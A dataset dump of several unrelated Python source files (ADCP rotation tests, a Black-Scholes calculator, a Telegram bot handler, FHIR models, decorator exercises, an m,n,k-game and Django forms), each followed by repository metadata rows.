vel[ky][3]), axis=0) if AHRS in d._fieldnames: vel['omat'] = np.transpose(getattr(d, AHRS)) if b5 in d._fieldnames: vel['b5'] = np.transpose(getattr(d, b5)) #vel['omat5'] = getattr(d, AHRS[1]) if bt+beam[0] in d._fieldnames: vel_bt = {'beam': {}, 'inst': {}, 'earth': {}} for ky in vel_bt.keys(): for i in range(len(axis[ky])): vel_bt[ky][i] = np.transpose(getattr(d, bt+axis[ky][i])) vel_bt[ky] = np.stack((vel_bt[ky][0], vel_bt[ky][1], vel_bt[ky][2], vel_bt[ky][3]), axis=0) return vel, vel_bt else: return vel def rotate(axis): # BenchFile01.ad2cp td_sig = rotate2(tr.dat_sig, axis, inplace=False) # Sig1000_IMU.ad2cp no userdata td_sig_i = rotate2(tr.dat_sig_i, axis, inplace=False) # VelEchoBT01.ad2cp td_sig_ieb = rotate2(tr.dat_sig_ieb, axis, inplace=False) # Sig500_Echo.ad2cp td_sig_ie = rotate2(tr.dat_sig_ie, axis, inplace=False) td_sig_vel = load_nortek_matfile(base.rfnm('BenchFile01.mat')) td_sig_i_vel = load_nortek_matfile(base.rfnm('Sig1000_IMU.mat')) td_sig_ieb_vel, vel_bt = load_nortek_matfile(base.rfnm('VelEchoBT01.mat')) td_sig_ie_vel = load_nortek_matfile(base.rfnm('Sig500_Echo.mat')) nens = 100 # ARHS inst2earth orientation matrix check # Checks the 1,1 element because the nortek orientmat's shape is [9,:] as # opposed to [3,3,:] if axis == 'inst': assert_allclose(td_sig_i.orientmat[0][0].values, td_sig_i_vel['omat'][0, :nens], atol=1e-7) assert_allclose(td_sig_ieb.orientmat[0][0].values, td_sig_ieb_vel['omat'][0, :][..., :nens], atol=1e-7) # 4-beam velocity assert_allclose(td_sig.vel.values, td_sig_vel[axis][..., :nens], atol=1e-5) assert_allclose(td_sig_i.vel.values, td_sig_i_vel[axis][..., :nens], atol=5e-3) assert_allclose(td_sig_ieb.vel.values, td_sig_ieb_vel[axis][..., :nens], atol=5e-3) assert_allclose(td_sig_ie.vel.values, td_sig_ie_vel[axis][..., :nens], atol=1e-5) # 5th-beam velocity if axis == 'beam': assert_allclose(td_sig_i.vel_b5.values, td_sig_i_vel['b5'][..., :nens], atol=1e-5) assert_allclose(td_sig_ieb.vel_b5.values, td_sig_ieb_vel['b5'][..., :nens], atol=1e-5) assert_allclose(td_sig_ie.vel_b5.values, td_sig_ie_vel['b5'][..., :nens], atol=1e-5) # bottom-track assert_allclose(td_sig_ieb.vel_bt.values, vel_bt[axis][..., :nens], atol=5e-3) def test_rotate2_beam(): rotate('beam') def test_rotate2_inst(): rotate('inst') def test_rotate2_earth(): rotate('earth')
35.632
79
0.606646
642
4,454
3.990654
0.26324
0.052693
0.062451
0.074161
0.300156
0.233802
0.12178
0.088993
0.077283
0.056206
0
0.031147
0.250337
4,454
124
80
35.919355
0.736149
0.085317
0
0.051282
0
0
0.080245
0.006687
0
0
0
0
0.141026
1
0.064103
false
0
0.076923
0
0.166667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda2bb0b49a3956bff9896df11bb2cfb1702c6a1
1,022
py
Python
vscode/extensions/magicstack.magicpython-1.0.12/test/regexp/python2.py
nlimpid/dotfiles
b78d08707992f742f984f556fa58349c2ccd095d
[ "MIT" ]
5
2017-02-22T10:17:39.000Z
2021-04-06T16:36:13.000Z
test/regexp/python2.py
Setonas/MagicSetonas
ef76da5f27a0506b194c58072b81424e3ce985d7
[ "MIT" ]
4
2019-06-16T09:52:03.000Z
2019-08-18T02:11:35.000Z
vscode/extensions/magicstack.magicpython-1.0.12/test/regexp/python2.py
nlimpid/dotfiles
b78d08707992f742f984f556fa58349c2ccd095d
[ "MIT" ]
1
2020-08-29T02:30:52.000Z
2020-08-29T02:30:52.000Z
a = r' (?x) foo ' a : source.python : source.python = : keyword.operator.assignment.python, source.python : source.python r : source.python, storage.type.string.python, string.regexp.quoted.single.python ' : punctuation.definition.string.begin.python, source.python, string.regexp.quoted.single.python : invalid.illegal.newline.python, source.python, string.regexp.quoted.single.python : source.python ( : punctuation.parenthesis.begin.python, source.python ? : invalid.illegal.operator.python, source.python x : source.python ) : punctuation.parenthesis.end.python, source.python : source.python foo : source.python ' : punctuation.definition.string.begin.python, source.python, string.quoted.docstring.single.python : invalid.illegal.newline.python, source.python, string.quoted.docstring.single.python
42.583333
112
0.622309
103
1,022
6.174757
0.23301
0.301887
0.339623
0.150943
0.638365
0.544025
0.496855
0.496855
0.374214
0
0
0
0.272994
1,022
23
113
44.434783
0.855989
0
0
0.2
0
0.1
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
3
bda33f238048fa796ed848c9125688fdcab82f49
1,331
py
Python
backend/flaskr/formula.py
jyyang42/RobinOptionCalculator
be3f06f6ae54c7e2dd4badc258a9888e3e240a4a
[ "MIT" ]
1
2020-11-19T19:47:48.000Z
2020-11-19T19:47:48.000Z
backend/flaskr/formula.py
jyyang42/RobinOptionCalculater
be3f06f6ae54c7e2dd4badc258a9888e3e240a4a
[ "MIT" ]
7
2020-06-23T07:07:10.000Z
2020-08-24T23:43:53.000Z
backend/flaskr/formula.py
jyyang42/RobinOptionCalculater
be3f06f6ae54c7e2dd4badc258a9888e3e240a4a
[ "MIT" ]
2
2020-08-25T02:45:10.000Z
2020-11-19T19:47:38.000Z
import math def get_d1(p0, X, t, sigma, Rho): # P0 stock price 62 # X exercise Price 60 # t time to expiration days/365 40 # sigma Volatility 0.32 # Rho Risk-Free Rate 0.04 # d1 = {ln(62/60) + [0.04 + 0.5 * 0.32 ^ 2] * (40/365)} / 0.32 * sqrt(40/365) a = math.log(p0/X) + (Rho + 0.5 * sigma * sigma) * (t / 365) b = sigma * math.sqrt(40/365) return a/b def get_d2(d1, sigma, t): # d1 - sigma * sqrt(t/365) return d1 - sigma * math.sqrt(t/365) def get_cumulative_standard_normal_distribution(d): return 0.5 * (1 + math.erf(d/math.sqrt(2))) def get_call(p0, Nd1, X, Krf, t, Nd2): a = p0 * Nd1 b = X / (math.pow(math.e, Krf * t/365)) return a - b * Nd2 def get_put(Vc, X, Krf, t, p0): return Vc + X / math.pow(math.e, Krf * t/365) - p0 if __name__ == "__main__": # Z = (x - µ) / sigma p0 = 62 X = 60 t = 40 sigma = 0.32 Rho = 0.04 d1 = get_d1(p0, X, t, sigma, Rho) d2 = get_d2(d1, sigma, t) Nd1 = get_cumulative_standard_normal_distribution(d1) Nd2 = get_cumulative_standard_normal_distribution(d2) Vc = get_call(p0, Nd1, X, Rho, t, Nd2) Vp = get_put(Vc, X, Rho, t, p0) print("d1:", d1) print("d2:", d2) print("Nd1:", Nd1) print("Nd2:", Nd2) print("Vc:", Vc) print("Vp:", Vp)
25.596154
81
0.552968
235
1,331
3.012766
0.251064
0.042373
0.088983
0.114407
0.34322
0.10452
0.10452
0.056497
0
0
0
0.123958
0.278738
1,331
52
82
25.596154
0.613542
0.180316
0
0
0
0
0.025854
0
0
0
0
0
0
1
0.151515
false
0
0.030303
0.090909
0.333333
0.181818
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda34ec056c93e4918c1bc75e8154a348bc2e5e2
932
py
Python
bot/modules/magnet.py
AliAryanTech/Nyaa-Telegram-Bot
d1614ed218fd9f413d046eec61978df269b325b6
[ "MIT" ]
12
2020-12-01T04:40:37.000Z
2022-01-22T14:19:04.000Z
bot/modules/magnet.py
AliAryanTech/Nyaa-Telegram-Bot
d1614ed218fd9f413d046eec61978df269b325b6
[ "MIT" ]
null
null
null
bot/modules/magnet.py
AliAryanTech/Nyaa-Telegram-Bot
d1614ed218fd9f413d046eec61978df269b325b6
[ "MIT" ]
19
2021-02-09T19:20:59.000Z
2022-03-18T12:05:08.000Z
from .get_response import nyaa_id, sukebei_id from bot import NYAA, botname from pyrogram import Client, filters from pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, CallbackQuery INVALID_TEXT = """ No ID found! """ @NYAA.on_message(filters.command(["magnet", f"magnet@{botname}"], prefixes = "/") & ~filters.edited) async def get_magnet(client, message): query = message.text.split(maxsplit = 2) if len(query) < 2 or len(query) > 2: await NYAA.send_message(chat_id = message.chat.id, text = INVALID_TEXT) return buttons = [ [ InlineKeyboardButton("Nyaa", f"nyaa {query[-1]}"), InlineKeyboardButton("Sukebei", f"sukebei {query[-1]}") ] ] await NYAA.send_message(chat_id = message.chat.id, text = "Where do you wanna search?", reply_markup = InlineKeyboardMarkup(buttons))
40.521739
137
0.637339
107
932
5.439252
0.457944
0.075601
0.089347
0.068729
0.147766
0.147766
0.147766
0.147766
0.147766
0.147766
0
0.007102
0.244635
932
23
137
40.521739
0.819602
0
0
0
0
0
0.119649
0
0
0
0
0
0
1
0
false
0
0.2
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda3f5b55352390d17d7c5c49807550e4e3deac1
297
py
Python
factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/images/api/serializers.py
kaka-lin/azure-intelligent-edge-patterns
766833c7c25d2458cec697937be288202d1763bc
[ "MIT" ]
176
2019-07-03T00:20:15.000Z
2022-03-14T07:51:22.000Z
factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/images/api/serializers.py
kaka-lin/azure-intelligent-edge-patterns
766833c7c25d2458cec697937be288202d1763bc
[ "MIT" ]
121
2019-06-24T20:47:27.000Z
2022-03-28T02:16:18.000Z
factory-ai-vision/EdgeSolution/modules/WebModule/backend/vision_on_edge/images/api/serializers.py
kaka-lin/azure-intelligent-edge-patterns
766833c7c25d2458cec697937be288202d1763bc
[ "MIT" ]
144
2019-06-18T18:48:43.000Z
2022-03-31T12:14:46.000Z
"""App API serializers. """ import logging from rest_framework import serializers from ..models import Image logger = logging.getLogger(__name__) class ImageSerializer(serializers.ModelSerializer): """ImageSerializer.""" class Meta: model = Image fields = "__all__"
15.631579
51
0.703704
29
297
6.896552
0.689655
0
0
0
0
0
0
0
0
0
0
0
0.198653
297
18
52
16.5
0.840336
0.124579
0
0
0
0
0.028226
0
0
0
0
0
0
1
0
false
0
0.375
0
0.625
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
1
0
0
3
bda4133fe40f05627ed065666e33a64ba888ab8f
18,060
py
Python
fhir/resources/DSTU2/implementationguide.py
cstoltze/fhir.resources
52f99738935b7313089d89daf94d73ce7d167c9d
[ "BSD-3-Clause" ]
144
2019-05-08T14:24:43.000Z
2022-03-30T02:37:11.000Z
fhir/resources/DSTU2/implementationguide.py
cstoltze/fhir.resources
52f99738935b7313089d89daf94d73ce7d167c9d
[ "BSD-3-Clause" ]
82
2019-05-13T17:43:13.000Z
2022-03-30T16:45:17.000Z
fhir/resources/DSTU2/implementationguide.py
cstoltze/fhir.resources
52f99738935b7313089d89daf94d73ce7d167c9d
[ "BSD-3-Clause" ]
48
2019-04-04T14:14:53.000Z
2022-03-30T06:07:31.000Z
# -*- coding: utf-8 -*- """ Profile: https://www.hl7.org/fhir/DSTU2/implementationguide.html Release: DSTU2 Version: 1.0.2 Revision: 7202 """ from typing import Any, Dict from typing import List as ListType from pydantic import Field, root_validator from . import backboneelement, domainresource, fhirtypes class ImplementationGuide(domainresource.DomainResource): """A set of rules about how FHIR is used. A set of rules of how a particular interoperability or standards problem is solved - typically through the use of FHIR resources. This resource is used to gather all the parts of an implementation guide into a logical whole and to publish a computable definition of all the parts. """ resource_type = Field("ImplementationGuide", const=True) binary: ListType[fhirtypes.Uri] = Field( None, alias="binary", title="List of `uri` items.", description="Image, css, script, etc..", ) contact: ListType[fhirtypes.ImplementationGuideContactType] = Field( None, alias="contact", title="Contact details for the publisher", description=( "Contact details to assist a user in finding and communicating with the" " publisher." ), ) copyright: fhirtypes.String = Field( None, alias="copyright", title="Use and/or publishing restrictions", description=( "A copyright statement relating to the implementation guide and/or its " "contents. Copyright statements are generally legal restrictions on the" " use and publishing of the implementation guide." ), ) date: fhirtypes.DateTime = Field( None, alias="date", title="Date last changed", description=( "The date (and optionally time) when the implementation guide was " "published. The date must change when the business version changes and " "it must change if the status code changes. In addition, it should " "change when the substantive content of the implementation guide " "changes." ), ) dependency: ListType[fhirtypes.ImplementationGuideDependencyType] = Field( None, alias="dependency", title="Another Implementation guide this depends on", description=( "Another implementation guide that this implementation depends on. " "Typically, an implementation guide uses value sets, profiles " "etc.defined in other implementation guides." ), ) description: fhirtypes.String = Field( None, alias="description", title="Natural language description of the implementation guide", description=( "A free text natural language description of the implementation guide " "from a consumer's perspective." ), ) experimental: fhirtypes.Boolean = Field( None, alias="experimental", title="For testing purposes, not real usage", description=( "A Boolean value to indicate that this implementation guide is authored" " for testing purposes (or education/evaluation/marketing) and is not " "intended to be used for genuine usage." ), ) fhirVersion: fhirtypes.Id = Field( None, alias="fhirVersion", title="FHIR Version this Implementation Guide targets", description=( "The version(s) of the FHIR specification that this ImplementationGuide" " targets - e.g. describes how to use. The value of this element is the" " formal version of the specification, without the revision number, " "e.g. [publication].[major].[minor], which is 4.0.1. for this version." ), ) global_fhir: ListType[fhirtypes.ImplementationGuideGlobalType] = Field( None, alias="global", title="Profiles that apply globally", description=( "A set of profiles that all resources covered by this implementation " "guide must conform to." ), ) name: fhirtypes.String = Field( ..., alias="name", title="Name for this implementation guide (computer friendly)", description=( "A natural language name identifying the implementation guide. This " "name should be usable as an identifier for the module by machine " "processing applications such as code generation." ), ) package: ListType[fhirtypes.ImplementationGuidePackageType] = Field( ..., alias="package", title="List of `ImplementationGuidePackage` items (represented as `dict` in JSON).", description="Group of resources as used in .page.package.", ) page: fhirtypes.ImplementationGuidePageType = Field( ..., alias="page", title="Type `ImplementationGuidePage` (represented as `dict` in JSON).", description="Page/Section in the Guide.", ) publisher: fhirtypes.String = Field( None, alias="publisher", title="Name of the publisher (organization or individual)", description=( "The name of the organization or individual that published the " "implementation guide." ), ) status: fhirtypes.Code = Field( ..., alias="status", title="draft | active | retired", description=( "The status of this implementation guide. Enables tracking the life-" "cycle of the content." ), # note: Enum values can be used in validation, # but use in your own responsibilities, read official FHIR documentation. enum_values=["draft", "active", "retired"], ) url: fhirtypes.Uri = Field( ..., alias="url", title=( "Canonical identifier for this implementation guide, represented as a " "URI (globally unique)" ), description=( "An absolute URI that is used to identify this implementation guide " "when it is referenced in a specification, model, design or an " "instance; also called its canonical identifier. This SHOULD be " "globally unique and SHOULD be a literal address at which at which an " "authoritative instance of this implementation guide is (or will be) " "published. This URL can be the target of a canonical reference. It " "SHALL remain the same when the implementation guide is stored on " "different servers." ), ) useContext: ListType[fhirtypes.CodeableConceptType] = Field( None, alias="useContext", title="The context that the content is intended to support", description=( "The content was developed with a focus and intent of supporting the " "contexts that are listed. These contexts may be general categories " "(gender, age, ...) or may be references to specific programs " "(insurance plans, studies, ...) and may be used to assist with " "indexing and searching for appropriate implementation guide instances." ), ) version: fhirtypes.String = Field( None, alias="version", title="Business version of the implementation guide", description=( "The identifier that is used to identify this version of the " "implementation guide when it is referenced in a specification, model, " "design or instance. This is an arbitrary value managed by the " "implementation guide author and is not expected to be globally unique." " For example, it might be a timestamp (e.g. yyyymmdd) if a managed " "version is not available. There is also no expectation that versions " "can be placed in a lexicographical sequence." ), ) class ImplementationGuideContact(backboneelement.BackboneElement): """Contact details of the publisher. Contacts to assist a user in finding and communicating with the publisher. """ resource_type = Field("ImplementationGuideContact", const=True) name: fhirtypes.String = Field( None, alias="name", title="Type `str`.", description="Name of a individual to contact.", ) telecom: ListType[fhirtypes.ContactPointType] = Field( None, alias="telecom", title="List of `ContactPoint` items (represented as `dict` in JSON).", description="Contact details for individual or publisher.", ) class ImplementationGuideDependency(backboneelement.BackboneElement): """Another Implementation guide this depends on. Another implementation guide that this implementation depends on. Typically, an implementation guide uses value sets, profiles etc.defined in other implementation guides. """ resource_type = Field("ImplementationGuideDependsOn", const=True) type: fhirtypes.Code = Field( ..., alias="type", title="Type `str`.", description="reference | inclusion.", # note: Enum values can be used in validation, # but use in your own responsibilities, read official FHIR documentation. enum_values=["reference", "inclusion"], ) uri: fhirtypes.Uri = Field( ..., alias="uri", title="Identity of the IG that this depends on", description="A canonical reference to the Implementation guide for the dependency.", ) class ImplementationGuideGlobal(backboneelement.BackboneElement): """Profiles that apply globally. A set of profiles that all resources covered by this implementation guide must conform to. """ resource_type = Field("ImplementationGuideGlobal", const=True) profile: fhirtypes.ReferenceType = Field( ..., alias="profile", title="Profile that all resources must conform to", description="A reference to the profile that all instances must conform to.", # note: Listed Resource Type(s) should be allowed as Reference. enum_reference_types=["StructureDefinition"], ) type: fhirtypes.Code = Field( ..., alias="type", title="Type this profile applies to", description="The type of resource that all instances must conform to.", ) class ImplementationGuidePackage(backboneelement.BackboneElement): """Group of resources as used in .page.package. A logical group of resources. Logical groups can be used when building pages. """ resource_type = Field("ImplementationGuidePackage", const=True) description: fhirtypes.String = Field( None, alias="description", title="Type `str`.", description="Human readable text describing the package.", ) name: fhirtypes.String = Field( ..., alias="name", title="Type `str`.", description="Name used .page.package.", ) resource: ListType[fhirtypes.ImplementationGuidePackageResourceType] = Field( ..., alias="resource", title=( "List of `ImplementationGuidePackageResource` items (represented as `dict` " "in JSON)." ), description="Resource in the implementation guide.", ) class ImplementationGuidePackageResource(backboneelement.BackboneElement): """Resource in the implementation guide. A resource that is part of the implementation guide. Conformance resources (value set, structure definition, conformance statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource. """ resource_type = Field("ImplementationGuidePackageResource", const=True) acronym: fhirtypes.String = Field( None, alias="acronym", title="Type `str`.", description="Short code to identify the resource.", ) description: fhirtypes.String = Field( None, alias="description", title="Type `str`.", description="Reason why included in guide.", ) exampleFor: fhirtypes.ReferenceType = Field( None, alias="exampleFor", title=( "Type `Reference` referencing `StructureDefinition` (represented as `dict` " "in JSON)." ), description="Resource this is an example of (if applicable).", # note: Listed Resource Type(s) should be allowed as Reference. enum_reference_types=["StructureDefinition"], ) name: fhirtypes.String = Field( None, alias="name", title="Type `str`.", description="Human Name for the resource.", ) purpose: fhirtypes.Code = Field( ..., alias="purpose", title="Type `str`.", description=( "example | terminology | profile | extension | dictionary | logical." ), # note: Enum values can be used in validation, # but use in your own responsibilities, read official FHIR documentation. enum_values=[ "example", "terminology", "profile", "extension", "dictionary", "logical", ], ) sourceReference: fhirtypes.ReferenceType = Field( None, alias="sourceReference", title="Type `Reference` referencing `Resource` (represented as `dict` in JSON).", description="Location of the resource.", # Choice of Data Types. i.e timing[x] one_of_many="source", one_of_many_required=True, # note: Listed Resource Type(s) should be allowed as Reference. enum_reference_types=["Resource"], ) sourceUri: fhirtypes.Uri = Field( None, alias="sourceUri", title="Type `str`.", description="Location of the resource.", # Choice of Data Types. i.e timing[x] one_of_many="source", one_of_many_required=True, ) @root_validator(pre=True) def validate_one_of_many(cls, values: Dict[str, Any]) -> Dict[str, Any]: """https://www.hl7.org/fhir/formats.html#choice A few elements have a choice of more than one data type for their content. All such elements have a name that takes the form nnn[x]. The "nnn" part of the name is constant, and the "[x]" is replaced with the title-cased name of the type that is actually used. The table view shows each of these names explicitly. Elements that have a choice of data type cannot repeat - they must have a maximum cardinality of 1. When constructing an instance of an element with a choice of types, the authoring system must create a single element with a data type chosen from among the list of permitted data types. """ one_of_many_fields = { "source": ["sourceReference", "sourceUri"], } for prefix, fields in one_of_many_fields.items(): assert cls.__fields__[fields[0]].field_info.extra["one_of_many"] == prefix required = ( cls.__fields__[fields[0]].field_info.extra["one_of_many_required"] is True ) found = False for field in fields: if field in values and values[field] is not None: if found is True: raise ValueError( "Any of one field value is expected from " f"this list {fields}, but got multiple!" ) else: found = True if required is True and found is False: raise ValueError(f"Expect any of field value from this list {fields}.") return values class ImplementationGuidePage(backboneelement.BackboneElement): """Page/Section in the Guide. A page / section in the implementation guide. The root page is the implementation guide home page. """ resource_type = Field("ImplementationGuidePage", const=True) format: fhirtypes.Code = Field( None, alias="format", title="Type `str`.", description="Format of the page (e.g. html, markdown, etc.).", ) kind: fhirtypes.Code = Field( ..., alias="kind", title="Type `str`.", description=( "page | example | list | include | directory | dictionary | toc | resource." ), # note: Enum values can be used in validation, # but use in your own responsibilities, read official FHIR documentation. enum_values=[ "page", "example", "list", "include", "directory", "dictionary", "toc", "resource", ], ) name: fhirtypes.String = Field( ..., alias="name", title="Type `str`.", description="Short name shown for navigational assistance.", ) package: ListType[fhirtypes.String] = Field( None, alias="package", title="List of `str` items.", description="Name of package to include.", ) page: ListType[fhirtypes.ImplementationGuidePageType] = Field( None, alias="page", title=( "List of `ImplementationGuidePage` items (represented as `dict` in JSON)." ), description="Nested Pages / Sections.", ) source: fhirtypes.Uri = Field( ..., alias="source", title="Type `Uri`.", description="Where to find that page.", ) type: ListType[fhirtypes.Code] = Field( None, alias="type", title="List of `Code` items.", description="Kind of resource to include in the list.", )
34.334601
92
0.612901
1,916
18,060
5.748956
0.216597
0.060372
0.031775
0.025057
0.326464
0.271448
0.240309
0.208352
0.180209
0.180209
0
0.001418
0.297176
18,060
525
93
34.4
0.866383
0.155371
0
0.347044
0
0.002571
0.416461
0.023859
0
0
0
0
0.002571
1
0.002571
false
0
0.010283
0
0.154242
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda5541d8519516c1c651c498c62fb368ec8e19e
2,796
py
Python
Decorator Foundation.py
Enthuisasticpessimist/Small-exercise
b169000023c3863f9e30d2cfc7c0f6e228f612f7
[ "MIT" ]
null
null
null
Decorator Foundation.py
Enthuisasticpessimist/Small-exercise
b169000023c3863f9e30d2cfc7c0f6e228f612f7
[ "MIT" ]
null
null
null
Decorator Foundation.py
Enthuisasticpessimist/Small-exercise
b169000023c3863f9e30d2cfc7c0f6e228f612f7
[ "MIT" ]
null
null
null
##-----------Non parametric decorator---------------- ####initialization ##name = 'a' ##password = '1' ##user_status = False ## ####decorator ##def login(func): ## def inner(): ## global name,password,user_status ## if user_status == True: ## pass ## else: ## n = input('name:') ## p = input('password:') ## if n == name and p == password: ## user_status = True ## if user_status: ## func() ## return inner ## ##@login ##def webpage1(): ## print('webpage---1') ##@login ##def webpage2(): ## print('webpage---2') ## ####webpage1 = login(webpage1)##original method1 ####webpage2 = login(webpage2)##original method2 ##webpage1() ##webpage2() ##-----------Non parametric decorator---------------- ####-----------Parametric decorator-------------------- ####initialization ##name = 'a' ##password = '1' ##user_status = False ## ####decorator ##def login(func): ## def inner(*args,**kwargs):##arbitrary parameters can be passed in ## global name,password,user_status ## if user_status == True: ## pass ## else: ## n = input('name:') ## p = input('password:') ## if n == name and p == password: ## user_status = True ## if user_status: ## func(*args,**kwargs)##arbitrary parameters can be passed in ## return inner ## ##@login ##def webpage1(arg): ## print('webpage---1',arg) ##@login ##def webpage2(): ## print('webpage---2') ## ####webpage1 = login(webpage1)##original method1 ####webpage2 = login(webpage2)##original method2 ##webpage1('111') ##webpage2() ####-----------Parametric decorator-------------------- ##-----------Multi-layer decorator-------------------- ##initialization name = 'a' password = '1' user_status = False ##decorator def login(auth_type): def outer(func): def inner(*args,**kwargs):##arbitrary parameters can be passed in global name,password,user_status if auth_type == 'qq': if user_status == True: pass else: n = input('name:') p = input('password:') if n == name and p == password: user_status = True if user_status: func(*args,**kwargs)##arbitrary parameters can be passed in else: print('auth_type is wrong!') return inner return outer @login('qq') def webpage1(arg): print('webpage---1',arg) @login('weixin') def webpage2(): print('webpage---2') ##temp = login("qq")##original method1 ##webpage1 = temp(webpage1) webpage1('111') ##-----------Multi-layer decorator--------------------
26.377358
79
0.508941
279
2,796
5.035842
0.189964
0.106762
0.076868
0.082562
0.824199
0.776512
0.776512
0.776512
0.730249
0.730249
0
0.020049
0.268598
2,796
105
80
26.628571
0.666993
0.629828
0
0.071429
0
0
0.082063
0
0
0
0
0
0
1
0.178571
false
0.178571
0
0
0.25
0.107143
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
7
bda5691ceabca9d9b32498222c4155793f52475a
2,325
py
Python
src/mnkgame.py
isihya/minimax_algorithm_MNKgame
9876c12d065422334d87bf24c6d82171c7ace89e
[ "MIT" ]
null
null
null
src/mnkgame.py
isihya/minimax_algorithm_MNKgame
9876c12d065422334d87bf24c6d82171c7ace89e
[ "MIT" ]
null
null
null
src/mnkgame.py
isihya/minimax_algorithm_MNKgame
9876c12d065422334d87bf24c6d82171c7ace89e
[ "MIT" ]
null
null
null
import numpy as np from game import Game class MNKgame(Game): """ https://en.wikipedia.org/wiki/M,n,k-game If m=3, n=3, k=3. This is TicTakToe and default """ def __init__(self, n=3, m=3, k=3, field=None): self.n = n self.m = m self.k = k self.field = field if field is None: self.field = np.zeros((n, m)) self.winner = 0 def evaluate(self, field) -> bool: # down for x in range(self.m): score = self.scan(field, (1, 0), 0, x) if score != 0: return score # right for y in range(self.n): score = self.scan(field, (0, 1), y, 0) if score != 0: return score # right down for x in range(self.m): score = self.scan(field, (1, 1), 0, x) if score != 0: return score for y in range(self.n): score = self.scan(field, (1, 1), y, 0) if score != 0: return score # right up for x in range(self.n): score = self.scan(field, (-1, 1), self.m, x) if score != 0: return score for y in range(self.m): score = self.scan(field, (-1, 1), y, 0) if score != 0: return score return 0 def scan(self, field, d, i, j) -> bool: cnt_player = 0 cnt_enemy = 0 while(self.is_in_field(i, j)): if int(field[i][j]) == 1: cnt_player += 1 if cnt_player == self.k: return 1 elif int(field[i][j]) == -1: cnt_enemy += 1 if cnt_enemy == self.k: return -1 else: cnt_player = 0 cnt_enemy = 0 i += d[0] j += d[1] return 0 def is_in_field(self, i, j): if 0 <= i and i < self.n and 0 <= j and j < self.m: return True return False def update(self, action, val): self.field[action[0]][action[1]] = val def get_actions(self, field): indexes = np.where(field == 0) if len(indexes[0]) == 0: return [] return list(zip(indexes[0], indexes[1]))
28.012048
59
0.44129
324
2,325
3.114198
0.20679
0.048563
0.065411
0.107037
0.424182
0.420218
0.349851
0.328048
0.328048
0.296333
0
0.040335
0.434839
2,325
82
60
28.353659
0.727549
0.051613
0
0.333333
0
0
0
0
0
0
0
0
0
1
0.090909
false
0
0.030303
0
0.348485
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bda5f88b1ed70dd6d4320c4922009e7031b24847
2,721
py
Python
memoit/main/forms.py
Szymon-I/Memo-IT-App
f435331c4fbd68d34a5fb1d1f6b54117bab6b864
[ "MIT" ]
null
null
null
memoit/main/forms.py
Szymon-I/Memo-IT-App
f435331c4fbd68d34a5fb1d1f6b54117bab6b864
[ "MIT" ]
14
2019-08-06T02:06:17.000Z
2022-03-11T23:49:01.000Z
memoit/main/forms.py
Szymon-I/Memo-IT-App
f435331c4fbd68d34a5fb1d1f6b54117bab6b864
[ "MIT" ]
null
null
null
from django import forms from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User from .choices import * from django.contrib.auth.forms import AuthenticationForm from django.core.exceptions import ObjectDoesNotExist from django.forms import ValidationError # override basic authentication form to allow logging in with email or username class EmailAuthenticationForm(AuthenticationForm): def clean_username(self): username = self.data['username'] if '@' in username: try: username = User.objects.get(email=username).username except ObjectDoesNotExist: raise ValidationError( self.error_messages['invalid_login'], code='invalid_login', params={'username': self.username_field.verbose_name}, ) return username # override basic user creation for to add required email field class NewUserForm(UserCreationForm): email = forms.EmailField(required=True) class Meta: model = User fields = ("username", "email", "password1", "password2") def save(self, commit=True): user = super(NewUserForm, self).save(commit=False) if commit: user.save() return user # form for creating basic text note class NoteForm(forms.Form): title = forms.CharField(max_length=100) content = forms.CharField( widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False) theme = forms.ChoiceField(choices=THEMES, label="Theme", initial='', widget=forms.Select(), required=True) # form for creating list note class NoteListForm(forms.Form): title = forms.CharField(max_length=100) content = forms.CharField(required=False, label="List items", widget=forms.TextInput(attrs={'placeholder': 'Add item and press Enter'})) theme = forms.ChoiceField(choices=THEMES, label="Theme", initial='', widget=forms.Select(), required=True) # form for creating picture note class NotePictureForm(forms.Form): title = forms.CharField(max_length=100) content = forms.CharField( widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False) picture = forms.ImageField() # override picture note form to show actual picture path class NotePictureFormUpdate(forms.Form): title = forms.CharField(max_length=100) content = forms.CharField( widget=forms.Textarea(attrs={'width': "100%", 'cols': "80", 'rows': "20", 'height': '100%'}), required=False) picture = forms.ImageField(required=False)
37.791667
117
0.669974
307
2,721
5.905537
0.345277
0.061776
0.030888
0.041919
0.408163
0.408163
0.372863
0.372863
0.372863
0.372863
0
0.020456
0.209482
2,721
71
118
38.323944
0.822408
0.105108
0
0.215686
0
0
0.091433
0
0
0
0
0
0
1
0.039216
false
0.019608
0.137255
0
0.607843
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
